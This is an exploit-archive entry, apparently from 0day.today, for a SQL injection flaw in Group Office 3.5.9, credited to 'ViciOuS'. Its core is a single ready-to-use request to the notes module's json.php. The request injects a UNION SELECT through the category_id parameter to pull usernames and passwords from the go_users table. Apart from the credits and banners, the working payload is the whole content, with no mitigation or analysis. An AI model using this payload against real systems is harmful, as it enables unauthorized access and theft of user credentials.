id: 14005
date: 09/12/2010
title: Group Office 3.5.9 SQL Injection Vulnerability
author: ViciOuS
cves: 

==============================================
Group Office 3.5.9 SQL Injection Vulnerability
==============================================

########################################################################################
 
Author : ViciOuS
Author Web Page :http://www.sabotaj.in
Email : vicious[at]sabotaj.in
Script Page : http://www.group-office.com
 
########################################################################################
  
Sql Injection :
 
http://localhost/www/groupoffice-com-3.5.9/modules/notes/json.php?task=category&category_id=999999 union(select 1,concat_ws(0x3a,username,password),3,4+from+go_users)--
 
########################################################################################
Thanks WwW.sabotaj.iN
########################################################################################



#  0day.today [2023-03-26]  #